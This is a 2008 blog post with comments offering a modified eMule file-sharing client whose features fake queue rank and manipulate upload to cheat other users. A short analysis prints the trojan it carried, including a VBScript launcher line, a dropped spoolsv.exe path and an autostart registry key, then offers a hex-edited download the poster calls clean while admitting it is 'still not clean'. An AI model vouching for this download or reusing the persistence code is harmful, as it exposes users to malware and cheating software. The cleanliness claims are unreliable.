Wednesday, July 9, 2008

eMule 0.48a Final Fight Gold [Clean]

eMule 0.48a Final Fight Gold

eMule v0.48a Final Fight Gold
0.48a eMule Final Fight Gold (5) based on
Sivka 0.48a v18a1-alpha

Modded by Ruffy
15-May-2008

-Fake Rank
-Queue Size Verändert
-Max Queue Rank beim Download erhöht
-Ändern der Upload – Slotanzahl
-Upload wurde manipuliert, (Man kann es auf 1 setzen ohne das sich der Down-Speed ändert) Upload manipulated, it can be set to 1 it will not affect the Down-Speed
-Remove Ratio
-Remove Wizard
-Remove Help
-Added new Icons


Code analyse:
Agent.ECJH
Malware to: Documents and Settings\YourWindowsLogonName\Application Data\Microsoft\spoolsv.exe
and
cfgmgr.vbs
with content:
Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run Chr(34) & "C:\Documents and Settings\Nata...\Application Data\Microsoft\spoolsv.exe" & Chr(34)
was add the registry entries: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}

result still not clean but the virus is possible eliminated and can not more start nor produce
http://www.virustotal.com/analisis/dde25155980c21598c035c52581fc250

I found: HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}

Download: IT SHOULD BE CLEAN NOW OR THE TROJAN IS NOW DESTROYED
eMule 0.48a Final Fight Gold -clean.zip
2.72 MB - Hexedited

4 comments:

Anonymous said...

Kaspersky 2009,Spybot,A-Squared
nothing found...
The Reg Key i don't found.
Sorry my english :-((

IlLusioN said...

Don;t know most c++ binaries with coded not attached or things with binder done not shown in the most AV's.
all emules before almost found inside exe with VBA32
http://vba32.de/demo/content/view/15/31/
maybe cause of:
http://en.wikipedia.org/wiki/Vba32_AntiVirus
the advantage of this AV:
- Usage of the “Delta-patch” technology
- Heuristic analyzer and technology of recognition of viruses MalwareScope, considerably improve the efficiency of new malicious programs detection
- Dynamic code translation processor emulator effectively handles complex-polymorphous viruses, packers and cryptors
... and many more

Scan bulk exe done with VC++ with
Virus Block Ada 32
http://vba32.de/anonymous/pub/Vba32Scan.zip

IlLusioN said...

newer version here:
ftp://anti-virus.by/pub/Vba32Scan.zip

scanner only

Anonymous said...

It's really clean now. Tested in sandbox and vp

Post a Comment